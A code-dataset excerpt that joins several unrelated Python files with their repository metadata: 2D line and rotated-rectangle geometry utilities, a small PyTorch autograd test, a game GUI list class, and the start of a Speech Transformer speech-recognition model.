def __eq__(self, other):
return isinstance(other, Line) and (all([
self.x1 == other.x1,
self.y1 == other.y1,
self.x2 == other.x2,
self.y2 == other.y2
]) or all([
self.x1 == other.x2,
self.y1 == other.y2,
self.x2 == other.x1,
self.y2 == other.y1
]))
# comparison object "other" must be a tuple of:
# (x, y, none_result) -> None comparisons return none_result
# (x, y) -> None comparisons throw TypeErrors
def __lt__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy < self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy < v) if v is not None else bool(none_result)
return (oy < v) if v is not None else (ox < self.x_at_y(oy))
raise TypeError(
"Cannot compare \"{}\" of type with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
# comparison object "other" must be a tuple of:
# (x, y, none_result) -> None comparisons return none_result
# (x, y) -> None comparisons throw TypeErrors
def __le__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy <= self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy <= v) if v is not None else bool(none_result)
return (oy <= v) if v is not None else (ox <= self.x_at_y(oy))
raise TypeError(
"Cannot compare \"{}\" of type with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
# comparison object "other" must be a tuple of:
# (x, y, none_result) -> None comparisons return none_result
# (x, y) -> None comparisons throw TypeErrors
def __gt__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy > self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy > v) if v is not None else bool(none_result)
return (oy > v) if v is not None else (ox > self.x_at_y(oy))
raise TypeError(
"Cannot compare \"{}\" of type with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
# comparison object "other" must be a tuple of:
# (x, y, none_result) -> None comparisons return none_result
# (x, y) -> None comparisons throw TypeErrors
def __ge__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy >= self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy >= v) if v is not None else bool(none_result)
return (oy >= v) if v is not None else (ox >= self.x_at_y(oy))
raise TypeError(
"Cannot compare \"{}\" of type with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
def y_at_x(self, x):
if self.m == "undefined":
# return None
return None
if self.m == 0:
return self.y1
return (self.m * x) + self.b
def x_at_y(self, y):
if self.m == "undefined":
return self.x1
if self.m == 0:
return None
return (y - self.b) / self.m
def translate(self, x, y):
self.x1 += x
self.x2 += x
self.y1 += y
self.y2 += y
self.init(self.x1, self.y1, self.x2, self.y2)
def translated(self, x, y):
r = Line(self.x1, self.y1, self.x2, self.y2)
r.translate(x, y)
return r
def __iter__(self):
lst = [self.p1, self.p2]
for val in lst:
yield val
def __repr__(self):
if self.m == "undefined":
return "x = {}".format(self.x1)
if self.m == 0:
return "y = {}".format(self.b)
return "y = {}x + {}".format("%.2f" % self.m, self.b)
# class Rect:
# def __init__(self, x, y=None, w=None, h=None):
# self.x = x
# self.y = y
# self.width = w
# self.height = h
# if any([y is None, w is None, h is None]):
# if is_imported("pygame"):
# if isinstance(x, pygame.Rect):
# x = x.left
# y = x.y
# w = x.width
# y = x.height
# else:
# raise ValueError("Cannot create a Rect object with <{}>.\nExpected a pygame.Rect object.".format(x))
# else:
# ValueError("Cannot create a rect object with <{}>.\npygame module is not imported.".format(x))
# self.is_init = False
# self.tupl = None
# self.top = None
# self.left = None
# self.bottom = None
# self.right = None
# self.center = None
# self.top_left = None
# self.top_right = None
# self.bottom_left = None
# self.bottom_right = None
# self.top_line = None
# self.left_line = None
# self.right_line = None
# self.bottom_line = None
# self.center_top = None
# self.center_left = None
# self.center_right = None
# self.center_bottom = None
# self.area = None
# self.perimetre = None
# self.init(x, y, w, h)
#
# def init(self, x, y, w, h):
# self.x = x
# self.y = y
# self.width = w
# self.height = h
# self.tupl = (x, y, w, h)
# self.top = y
# self.left = x
# self.bottom = y + h
# self.right = x + w
# self.center = x + (w / 2), y + (h / 2)
# self.top_left = x, y
# self.top_right = x + w, y
# self.bottom_left = x, y + h
# self.bottom_right = x + w, y + h
# self.center_top = self.center[0], y
# self.center_left = x, self.center[1]
# self.center_right = x + w, self.center[1]
# self.center_bottom = self.center[0], y + h
# self.area = w * h
# self.perimetre = 2 * (w + h)
# self.top_line = Line(*self.top_left, *self.top_right)
# self.left_line = Line(*self.top_left, *self.bottom_left)
# self.right_line = Line(*self.top_right, *self.bottom_right)
# self.bottom_line = Line(*self.bottom_left, *self.bottom_right)
# self.is_init = True
#
# def __iter__(self):
# lst = [self.x, self. y, self.width, self.height]
# for val in lst:
# yield val
#
# def collide_rect(self, rect, strictly_inside=True):
# if strictly_inside:
# return all([
# self.left < rect.left,
# self.right > rect.right,
# self.top < rect.top,
# self.bottom > rect.bottom
# ])
# else:
# return any([
# self.collide_point(*rect.top_left),
# self.collide_point(*rect.top_right),
# self.collide_point(*rect.bottom_left),
# self.collide_point(*rect.bottom_right)
# ])
#
# def collide_line(self, line):
# assert isinstance(line, Line)
# if self.collide_point(*line.p1) or self.collide_point(*line.p1):
# return True
# else:
# top = Line(self.left, self.top, self.right, self.top)
# bottom = Line(self.left, self.bottom, self.right, self.bottom)
# left = Line(self.left, self.top, self.left, self.bottom)
# right = Line(self.right, self.top, self.right, self.bottom)
# return any([
# line.collide_line(top),
# line.collide_line(bottom),
# line.collide_line(left),
# line.collide_line(right)
# ])
#
# def collide_point(self, x, y):
# return all([
# self.x <= x <= self.right,
# self.y <= y <= self.bottom
# ])
#
# def translate(self, x, y):
# if not self.is_init:
# self.init(self.x, self.y, self.width, self.height)
# self.x += x
# self.y += y
# self.init(self.x, self.y, self.width, self.height)
#
# def translated(self, x, y):
# r = Rect(self.x, self.y, self.width, self.height)
# r.translate(x, y)
# return r
#
# def scale(self, w_factor, h_factor):
# self.init(self.x, self.y, self.width * w_factor, self.height * h_factor)
#
# def scaled(self, w_factor, h_factor):
# r = Rect(self.x, self.y, self.width, self.height)
# r.scale(w_factor, h_factor)
# return r
#
# def move(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
#
# def resize(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
#
# def __repr__(self):
# return "<rect(" + ", ".join(list(map(str, [self.x, self.y, self.width, self.height]))) + ")>"
# x2,y2 x1,y1 ---- x2,y2
# x1,y1 / | | |
# | x3,y3 x4,y4 ---- x3,y3
# x4,y4 /
class Rect2:
def __init__(self, x, y=None, w=None, h=None, a=0):
self.x = None
self.y = None
self.w = None
self.h = None
self.width = None
self.height = None
self.angle = None
self.x1, self.y1 = None, None
self.x2, self.y2 = None, None
self.x3, self.y3 = None, None
self.x4, self.y4 = None, None
self.p1 = None
self.p2 = None
self.p3 = None
self.p4 = None
self.l1 = None
self.l2 = None
self.l3 = None
self.l4 = None
self.a = a % 360
self.angle = a % 360
self.tupl = None
self.max_encapsulating_rect = None
self.min_encapsulating_rect = None
self.top = None
self.left = None
self.bottom = None
self.right = None
self.center = None
self.top_left = None
self.top_right = None
self.bottom_left = None
self.bottom_right = None
self.center_top = None
self.center_left = None
self.center_right = None
self.center_bottom = None
self.area = None
self.perimeter = None
self.top_line = None
self.right_line = None
self.bottom_line = None
self.left_line = None
self.diagonal_p1_p3 = None
self.diagonal_p3_p1 = None
self.diagonal_p2_p4 = None
self.diagonal_p4_p2 = None
self.init(x, y, w, h, a)
def init(self, x, y, w, h, a):
if w < 0:
raise ValueError("width value: \"{}\" must not be less than 0.".format(w))
if h < 0:
raise ValueError("height value: \"{}\" must not be less than 0.".format(h))
self.x = x
self.y = y
self.w = w
self.h = h
self.width = w
self.height = h
self.angle = a
self.x1, self.y1 = x, y
self.x2, self.y2 = rotate_point(x, y, x + w, y, a)
self.x3, self.y3 = rotate_point(x, y, x + w, y + h, a)
self.x4, self.y4 = rotate_point(x, y, x, y + h, a)
self.p1 = self.x1, self.y1
self.p2 = self.x2, self.y2
self.p3 = self.x3, self.y3
self.p4 = self.x4, self.y4
self.l1 = Line(self.x1, self.y1, self.x2, self.y2)
self.l2 = Line(self.x2, self.y2, self.x3, self.y3)
self.l3 = Line(self.x3, self.y3, self.x4, self.y4)
self.l4 = Line(self.x4, self.y4, self.x1, self.y1)
self.top_line = self.l1
self.right_line = self.l2
self.bottom_line = self.l3
self.left_line = self.l4
# self.tupl = (self.p1, self.p2, self.p3, self.p4)
self.tupl = (self.x, self.y, self.w, self.h)
if a == 0:
self.max_encapsulating_rect = self
self.min_encapsulating_rect = self
else:
xs = [self.x1, self.x2, self.x3, self.x4]
ys = [self.y1, self.y2, self.y3, self.y4]
xs.sort()
ys.sort()
self.max_encapsulating_rect = Rect2(xs[0], ys[0], xs[3] - xs[0], ys[3] - ys[0], 0)
self.min_encapsulating_rect = Rect2(xs[1], ys[1], xs[2] - xs[1], ys[2] - ys[1], 0)
# Using max_encapsulating_rect for calculations
self.top = self.max_encapsulating_rect.y
self.left = self.max_encapsulating_rect.x
self.bottom = self.max_encapsulating_rect.y + self.max_encapsulating_rect.height
self.right = self.max_encapsulating_rect.x + self.max_encapsulating_rect.width
self.center = self.left + (self.max_encapsulating_rect.width / 2), self.top + (
self.max_encapsulating_rect.height / 2)
self.top_left = self.left, self.top
self.top_right = self.right, self.top
self.bottom_left = self.left, self.bottom
self.bottom_right = self.bottom, self.right
self.center_top = self.center[0], self.top
self.center_left = self.left, self.center[1]
self.center_right = self.right, self.center[1]
self.center_bottom = self.center[0], self.bottom
self.diagonal_p1_p3 = Line(*self.p1, *self.p3)
self.diagonal_p3_p1 = Line(*self.p3, *self.p2)
self.diagonal_p2_p4 = Line(*self.p2, *self.p4)
self.diagonal_p4_p2 = Line(*self.p4, *self.p2)
# Calculations done on the main rect object
self.area = w * h
self.perimeter = 2 * (w + h)
def __iter__(self):
lst = [self.x, self.y, self.width, self.height, self.angle]
for val in lst:
yield val
def collide_point(self, x, y, strictly_inside=False):
if not all([
any([
isinstance(x, int),
isinstance(x, float)
]),
any([
isinstance(y, int),
isinstance(y, float)
])
]):
raise TypeError(
"Cannot determine if x=\"{}\" of type: \"{}\" y=\"{}\" of type: \"{}\" collides with Rect object. Requires int and / or float objects.".format(
x, type(x), y, type(y)))
if strictly_inside:
return all([
(x, y, 1) < self.l1,
(x, y, 1) > self.l2,
(x, y, 1) > self.l3,
(x, y, 1) < self.l4
])
else:
return all([
(x, y, 1) <= self.l1,
(x, y, 1) >= self.l2,
(x, y, 1) >= self.l3,
(x, y, 1) <= self.l4
])
def collide_line(self, line, strictly_inside=False):
if not isinstance(line, Line):
raise TypeError(
"Cannot determine if line=\"{}\" of type: \"{}\" collides with Rect object. Requires Line object.".format(
line, type(line)))
if strictly_inside:
return all([
self.collide_point(*line.p1),
self.collide_point(*line.p2)
])
else:
return any([
self.collide_point(*line.p1),
self.collide_point(*line.p2)
])
def collide_rect(self, rect, strictly_inside=False):
if not isinstance(rect, Rect2):
raise TypeError(
"Cannot determine if rect=\"{}\" of type: \"{}\" collides with Rect object. Requires Rect object.".format(
rect, type(rect)))
if strictly_inside:
return all([
self.collide_point(*rect.p1),
self.collide_point(*rect.p2),
self.collide_point(*rect.p3),
self.collide_point(*rect.p4)
])
else:
return any([
self.collide_point(*rect.p1),
self.collide_point(*rect.p2),
self.collide_point(*rect.p3),
self.collide_point(*rect.p4)
])
def translate(self, x, y):
self.init(self.x + x, self.y + y, self.width, self.height, self.angle)
def translated(self, x, y):
return Rect2(self.x + x, self.y + y, self.width, self.height, self.angle)
def scale(self, w, h):
w = abs(w)
h = abs(h)
self.init(self.x, self.y, self.width * w, self.height * h, self.angle)
def scaled(self, x, y):
r = Rect2(*self)
r.scale(x, y)
return r
def rotate(self, a):
self.init(self.x, self.y, self.width, self.height, self.angle + a)
def rotated(self, a):
r = Rect2(*self)
r.rotate(a)
return r
# if any([y is None, w is None, h is None]):
# if is_imported("pygame"):
# if isinstance(x, pygame.Rect):
# x = x.left
# y = x.y
# w = x.width
# y = x.height
# else:
# raise ValueError("Cannot create a Rect object with <{}>.\nExpected a pygame.Rect object.".format(x))
# else:
# ValueError("Cannot create a rect object with <{}>.\npygame module is not imported.".format(x))
# self.is_init = False
# self.tupl = None
# self.top = None
# self.left = None
# self.bottom = None
# self.right = None
# self.center = None
# self.top_left = None
# self.top_right = None
# self.bottom_left = None
# self.bottom_right = None
# self.top_line = None
# self.left_line = None
# self.right_line = None
# self.bottom_line = None
# self.center_top = None
# self.center_left = None
# self.center_right = None
# self.center_bottom = None
# self.area = None
# self.perimetre = None
# self.init(x, y, w, h)
#
# def init(self, x, y, w, h):
# self.x = x
# self.y = y
# self.width = w
# self.height = h
# self.tupl = (x, y, w, h)
# self.top = y
# self.left = x
# self.bottom = y + h
# self.right = x + w
# self.center = x + (w / 2), y + (h / 2)
# self.top_left = x, y
# self.top_right = x + w, y
# self.bottom_left = x, y + h
# self.bottom_right = x + w, y + h
# self.center_top = self.center[0], y
# self.center_left = x, self.center[1]
# self.center_right = x + w, self.center[1]
# self.center_bottom = self.center[0], y + h
# self.area = w * h
# self.perimetre = 2 * (w + h)
# self.top_line = Line(*self.top_left, *self.top_right)
# self.left_line = Line(*self.top_left, *self.bottom_left)
# self.right_line = Line(*self.top_right, *self.bottom_right)
# self.bottom_line = Line(*self.bottom_left, *self.bottom_right)
# self.is_init = True
#
# def __iter__(self):
# lst = [self.x, self. y, self.width, self.height]
# for val in lst:
# yield val
#
# def collide_rect(self, rect, strictly_inside=True):
# if strictly_inside:
# return all([
# self.left < rect.left,
# self.right > rect.right,
# self.top < rect.top,
# self.bottom > rect.bottom
# ])
# else:
# return any([
# self.collide_point(*rect.top_left),
# self.collide_point(*rect.top_right),
# self.collide_point(*rect.bottom_left),
# self.collide_point(*rect.bottom_right)
# ])
#
# def collide_line(self, line):
# assert isinstance(line, Line)
# if self.collide_point(*line.p1) or self.collide_point(*line.p1):
# return True
# else:
# top = Line(self.left, self.top, self.right, self.top)
# bottom = Line(self.left, self.bottom, self.right, self.bottom)
# left = Line(self.left, self.top, self.left, self.bottom)
# right = Line(self.right, self.top, self.right, self.bottom)
# return any([
# line.collide_line(top),
# line.collide_line(bottom),
# line.collide_line(left),
# line.collide_line(right)
# ])
#
# def collide_point(self, x, y):
# return all([
# self.x <= x <= self.right,
# self.y <= y <= self.bottom
# ])
#
# def translate(self, x, y):
# if not self.is_init:
# self.init(self.x, self.y, self.width, self.height)
# self.x += x
# self.y += y
# self.init(self.x, self.y, self.width, self.height)
#
# def translated(self, x, y):
# r = Rect(self.x, self.y, self.width, self.height)
# r.translate(x, y)
# return r
#
# def scale(self, w_factor, h_factor):
# self.init(self.x, self.y, self.width * w_factor, self.height * h_factor)
#
# def scaled(self, w_factor, h_factor):
# r = Rect(self.x, self.y, self.width, self.height)
# r.scale(w_factor, h_factor)
# return r
#
# def move(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
#
# def resize(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
def __repr__(self):
return "<rect(p1:({}), p2:({}), p3:({}), p4:({}))>".format(self.p1, self.p2, self.p3, self.p4)
def date_suffix(day):
s_day = str(day)
if s_day[-1] == "1":
res = "st"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
elif s_day[-1] == "2":
res = "nd"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
elif s_day[-1] == "3":
res = "rd"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
else:
res = "th"
return res
# Takes "2021-08-03" -< August 3rd, 2021
def date_str_format(date_str):
date_obj = dt.datetime.fromisoformat(date_str)
suffix = date_suffix(date_obj.day)
res = dt.datetime.strftime(date_obj, "%B %d###, %Y").replace("###", suffix)
s_res = res.split(" ")
x = s_res[1] if s_res[1][0] != "0" else s_res[1][1:]
res = " ".join([s_res[0], x, s_res[2]])
return res
# Appends a counter '(1)' to a given file path to avoid overwriting.
def next_available_file_name(path):
counter = 0
path.replace("\\", "/")
og_path = path
while os.path.exists(path):
counter += 1
spl = og_path.split(".")
path = ".".join(spl[:-1]) + " ({}).".format(counter) + spl[-1]
path.replace("/", "\\")
return path
BLK_ONE = "1", " 1 \n 1 \n 1 \n 1 \n 1 "
BLK_TWO = "2", "22222\n 2\n22222\n2 \n22222"
BLK_THREE = "3", "33333\n 3\n 333\n 3\n33333"
BLK_FOUR = "4", " 4\n4 4\n44444\n 4\n 4"
BLK_FIVE = "5", "55555\n5 \n55555\n 5\n55555"
BLK_SIX = "6", "66666\n6 \n66666\n6 6\n66666"
BLK_SEVEN = "7", "77777\n 7\n 7\n 7\n 7"
BLK_EIGHT = "8", "88888\n8 8\n88888\n8 8\n88888"
BLK_NINE = "9", "99999\n9 9\n99999\n 9\n 9"
BLK_ZERO = "0", "00000\n00 0\n0 0 0\n0 00\n00000"
BLK_A = "A", " A \n A A \nAA AA\nAAAAA\nA A"
BLK_B = "B", "BBBB \nB BB\nBBBB \nB B\nBBBBB"
BLK_C = "C", " CCCC\nC \nC \nC \n CCCC"
BLK_D = "D", "DDDD \nD D\nD D\nD D\nDDDD "
BLK_E = "E", "EEEEE\nE \nEEE \nE \nEEEEE"
BLK_F = "F", "FFFFF\nF \nFFF \nF \nF "
BLK_G = "G", "GGGGG\nG \nG GG\nG G\nGGGGG"
BLK_H = "H", "H H\nH H\nHHHHH\nH H\nH H"
BLK_I = "I", "IIIII\n I \n I \n I \nIIIII"
BLK_J = "J", "JJJJJ\n J \n J \nJ J \nJJJ "
BLK_K = "K", "K K\nK K \nKKK \nK K \nK K"
BLK_L = "L", "L \nL \nL \nL \nLLLLL"
BLK_M = "M", " M M \nMMMMM\nM M M\nM M M\nM M M"
BLK_N = "N", "N N\nNN N\nN N N\nN NN\nN N"
BLK_O = "O", " OOO \nO O\nO O\nO O\n OOO "
BLK_P = "P", "PPPP \nP P\nPPPP \nP \nP "
BLK_Q = "Q", " QQQ \nQ Q\nQ Q\nQ QQ\n QQQQ"
BLK_R = "R", "RRRR \nR R\nRRRR \nR R \nR R"
BLK_S = "S", " SSS \nS \n SSS \n S\n SSS "
BLK_T = "T", "TTTTT\n T \n T \n T \n T "
BLK_U = "U", "U U\nU U\nU U\nU U\n UUU "
BLK_V = "V", "V V\nV V\nV V\n V V \n V "
BLK_W = "W", "W W W\nW W W\nW W W\nWWWWW\n W W "
BLK_X = "X", "X X\n X X \n X \n X X \nX X"
BLK_Y = "Y", "Y Y\n Y Y \n Y \n Y \n Y "
BLK_Z = "Z", "ZZZZZ\n Z \n Z \n Z \nZZZZZ"
BLK_ADDITION = "+", " \n + \n +++ \n + \n "
BLK_SUBTRACTION = "-", " \n \n --- \n \n "
BLK_MULTIPLICATION = "X", " \n X X \n X \n X X \n "
BLK_DIVISON = "/", " \n / \n / \n / \n "
BLK_PERCENTAGE = "%", "% %\n % \n % \n % \n% %"
| [
"abriggs1@unb.ca"
] | abriggs1@unb.ca |
e5725a8aae710a9d7a9701ea844e456eb498767a | 7d9de1ac9a70220f4cf1738c4ae25507ad85ca04 | /pytorch/range_test.py | 5c3290f374acb1d7c0f06f413e08b1a25af22704 | [] | no_license | seasa2016/code_test | e977804cc1c8a6e07d2ed99b0835fb93b09f7dd1 | 8ac8c3aec96c69c98a4ce2789fbfede28491a6fc | refs/heads/master | 2020-03-25T13:48:19.409894 | 2018-11-16T11:22:46 | 2018-11-16T11:22:46 | 143,843,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | import torch
import torch.nn as nn
a = torch.range(0,5,requires_grad=True)
loss = torch.sum(a) - 5
loss.backward()
print(a.grad) | [
"ericet1234@gmail.com"
] | ericet1234@gmail.com |
bed747c3c3a0581ffe2d77383b8e2571d2637536 | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /PORMain/pirates/piratesgui/ShipItemList.py | 14fdb75275497d82285f3ce5d3b4f6967e823517 | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,439 | py | # File: S (Python 2.4)
from direct.gui.DirectGui import *
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import InventoryItemList
from pirates.piratesgui import ShipItemGUI
from pirates.piratesbase import PiratesGlobals
class ShipItemList(InventoryItemList.InventoryItemList):
def __init__(self, inventory, height, trade = 0, buy = 0, sell = 0, use = 0):
InventoryItemList.InventoryItemList.__init__(self, inventory, height, trade, buy, sell, use)
self.initialiseoptions(ShipItemList)
def loadInventoryPanels(self):
for item in self.inventory:
data = [
item,
1]
self.addPanel(data, repack = 0)
self.repackPanels()
def addPanel(self, data, repack = 1):
panel = ShipItemGUI.ShipItemGUI(data, trade = self.trade, buy = self.buy, sell = self.sell, use = self.use)
panel.reparentTo(self.getCanvas())
self.panels.append(panel)
if repack:
self.repackPanels()
def repackPanels(self):
invHeight = len(self.inventory)
z = 0.01 + PiratesGuiGlobals.ShipItemGuiHeight
i = 0
for i in xrange(len(self.panels)):
self.panels[i].setPos(0.01, 0, -z * (i + 1))
self.panels[i].origionalPos = self.panels[i].getPos(render2d)
self['canvasSize'] = (0, PiratesGuiGlobals.ShipItemGuiWidth - 0.089, -z * (i + 1), 0)
| [
"brandoncarden12345@gmail.com"
] | brandoncarden12345@gmail.com |
df2666e3fd97881431c7a61a94434e2a383e53b3 | be707c76437382cbae951611b358bec257db0925 | /models/transformer/model.py | bd096f9871a2bab0b5c6121e9ca22a129275facf | [
"Apache-2.0"
] | permissive | sooftware/End-to-End-Speech-Recognition-Models | 1405738336d76a671df41b3a2f9a72280bda45d3 | 07d590adc91ad660867f49be565a3512347cd50a | refs/heads/main | 2023-02-11T14:39:28.523024 | 2021-01-10T18:57:46 | 2021-01-10T18:57:46 | 316,734,678 | 39 | 4 | Apache-2.0 | 2021-01-05T11:26:43 | 2020-11-28T12:59:44 | Python | UTF-8 | Python | false | false | 12,137 | py | # -*- coding: utf-8 -*-
# Soohwan Kim @ https://github.com/sooftware/
# This source code is licensed under the Apache 2.0 License license found in the
# LICENSE file in the root directory of this source tree.
# Reference :
# - **https://github.com/graykode/nlp-tutorial**
# - **https://github.com/dreamgonfly/transformer-pytorch**
# - **https://github.com/jadore801120/attention-is-all-you-need-pytorch**
# - **https://github.com/JayParks/transformer**
import math
import torch
import torch.nn as nn
from torch import Tensor
from typing import (
Optional,
Any,
Tuple,
Union,
)
from models.extractor import (
VGGExtractor,
DeepSpeech2Extractor,
)
from models.modules import (
Linear,
LayerNorm, Transpose,
)
from models.transformer.mask import (
get_attn_pad_mask,
get_decoder_self_attn_mask,
)
from models.transformer.embeddings import (
Embedding,
PositionalEncoding,
)
from models.transformer.layers import (
SpeechTransformerEncoderLayer,
SpeechTransformerDecoderLayer,
)
class SpeechTransformer(nn.Module):
"""
A Speech Transformer model. User is able to modify the attributes as needed.
The model is based on the paper "Attention Is All You Need".
Args:
num_classes (int): the number of classfication
d_model (int): dimension of model (default: 512)
input_dim (int): dimension of input
pad_id (int): identification of <PAD_token>
eos_id (int): identification of <EOS_token>
d_ff (int): dimension of feed forward network (default: 2048)
num_encoder_layers (int): number of encoder layers (default: 6)
num_decoder_layers (int): number of decoder layers (default: 6)
num_heads (int): number of attention heads (default: 8)
dropout_p (float): dropout probability (default: 0.3)
ffnet_style (str): if poswise_ffnet is 'ff', position-wise feed forware network to be a feed forward,
otherwise, position-wise feed forward network to be a convolution layer. (default: ff)
Inputs: inputs, input_lengths, targets, teacher_forcing_ratio
- **inputs** (torch.Tensor): tensor of sequences, whose length is the batch size and within which
each sequence is a list of token IDs. This information is forwarded to the encoder.
- **input_lengths** (torch.Tensor): tensor of sequences, whose contains length of inputs.
- **targets** (torch.Tensor): tensor of sequences, whose length is the batch size and within which
each sequence is a list of token IDs. This information is forwarded to the decoder.
Returns: output
- **output**: tensor containing the outputs
"""
def __init__(
self,
num_classes: int, # the number of classfication
d_model: int = 512, # dimension of model
input_dim: int = 80, # dimension of input
pad_id: int = 0, # identification of <PAD_token>
eos_id: int = 2, # identification of <EOS_token>
d_ff: int = 2048, # dimension of feed forward network
num_heads: int = 8, # number of attention heads
num_encoder_layers: int = 6, # number of encoder layers
num_decoder_layers: int = 6, # number of decoder layers
dropout_p: float = 0.3, # dropout probability
ffnet_style: str = 'ff', # feed forward network style 'ff' or 'conv'
extractor: str = 'vgg', # CNN extractor [vgg, ds2]
joint_ctc_attention: bool = False # flag indication whether to apply joint ctc attention
) -> None:
super(SpeechTransformer, self).__init__()
assert d_model % num_heads == 0, "d_model % num_heads should be zero."
self.extractor = extractor
self.joint_ctc_attention = joint_ctc_attention
self.eos_id = eos_id
self.pad_id = pad_id
if self.extractor == 'vgg':
input_dim = (input_dim - 1) << 5 if input_dim % 2 else input_dim << 5
self.conv = VGGExtractor(mask_conv=False)
elif self.extractor == 'ds2':
input_dim = int(math.floor(input_dim + 2 * 20 - 41) / 2 + 1)
input_dim = int(math.floor(input_dim + 2 * 10 - 21) / 2 + 1)
input_dim <<= 6
self.conv = DeepSpeech2Extractor(mask_conv=False)
else:
raise ValueError("Unsupported Extractor : {0}".format(extractor))
self.encoder = SpeechTransformerEncoder(
d_model=d_model,
input_dim=input_dim,
d_ff=d_ff,
num_layers=num_encoder_layers,
num_heads=num_heads,
ffnet_style=ffnet_style,
dropout_p=dropout_p,
pad_id=pad_id,
)
if self.joint_ctc_attention:
self.encoder_fc = nn.Sequential(
nn.BatchNorm1d(d_model),
Transpose(shape=(1, 2)),
nn.Dropout(dropout_p),
Linear(d_model, num_classes, bias=False)
)
self.decoder = SpeechTransformerDecoder(
num_classes=num_classes,
d_model=d_model,
d_ff=d_ff,
num_layers=num_decoder_layers,
num_heads=num_heads,
ffnet_style=ffnet_style,
dropout_p=dropout_p,
pad_id=pad_id,
eos_id=eos_id
)
self.decoder_fc = Linear(d_model, num_classes)
def forward(
self,
inputs: Tensor, # tensor of input sequences
input_lengths: Tensor, # tensor of input sequence lengths
targets: Optional[Tensor] = None, # tensor of target sequences
) -> Union[Tensor, tuple]:
encoder_log_probs = None
conv_feat = self.conv(inputs.unsqueeze(1), input_lengths)
conv_feat = conv_feat.transpose(1, 2)
batch_size, seq_length, num_channels, hidden_dim = conv_feat.size()
conv_feat = conv_feat.contiguous().view(batch_size, seq_length, num_channels * hidden_dim)
if self.extractor == 'vgg':
input_lengths = (input_lengths >> 2).int()
memory = self.encoder(conv_feat, input_lengths)
if self.joint_ctc_attention:
encoder_log_probs = self.encoder_fc(memory.transpose(1, 2)).log_softmax(dim=2)
output = self.decoder(targets, input_lengths, memory)
output = self.decoder_fc(output)
return output, encoder_log_probs, input_lengths
def greedy_search(self, inputs: Tensor, input_lengths: Tensor, device: str):
with torch.no_grad():
logit = self.forward(inputs, input_lengths)[0]
return logit.max(-1)[1]
class SpeechTransformerEncoder(nn.Module):
"""
The TransformerEncoder is composed of a stack of N identical layers.
Each layer has two sub-layers. The first is a multi-head self-attention mechanism,
and the second is a simple, position-wise fully connected feed-forward network.
Args:
d_model: dimension of model (default: 512)
input_dim: dimension of feature vector (default: 80)
d_ff: dimension of feed forward network (default: 2048)
num_layers: number of encoder layers (default: 6)
num_heads: number of attention heads (default: 8)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
dropout_p: probability of dropout (default: 0.3)
pad_id: identification of pad token (default: 0)
Inputs:
- **inputs**: list of sequences, whose length is the batch size and within which each sequence is list of tokens
- **input_lengths**: list of sequence lengths
"""
def __init__(
self,
d_model: int = 512, # dimension of model
input_dim: int = 80, # dimension of feature vector
d_ff: int = 2048, # dimension of feed forward network
num_layers: int = 6, # number of encoder layers
num_heads: int = 8, # number of attention heads
ffnet_style: str = 'ff', # style of feed forward network [ff, conv]
dropout_p: float = 0.3, # probability of dropout
pad_id: int = 0, # identification of pad token
) -> None:
super(SpeechTransformerEncoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.num_heads = num_heads
self.pad_id = pad_id
self.input_proj = Linear(input_dim, d_model)
self.input_norm = LayerNorm(d_model)
self.input_dropout = nn.Dropout(p=dropout_p)
self.positional_encoding = PositionalEncoding(d_model)
self.layers = nn.ModuleList(
[SpeechTransformerEncoderLayer(d_model, num_heads, d_ff, dropout_p, ffnet_style) for _ in range(num_layers)]
)
def forward(self, inputs: Tensor, input_lengths: Tensor = None) -> Tuple[Tensor, list]:
self_attn_mask = get_attn_pad_mask(inputs, input_lengths, inputs.size(1))
output = self.input_dropout(self.input_norm(self.input_proj(inputs)) + self.positional_encoding(inputs.size(1)))
for layer in self.layers:
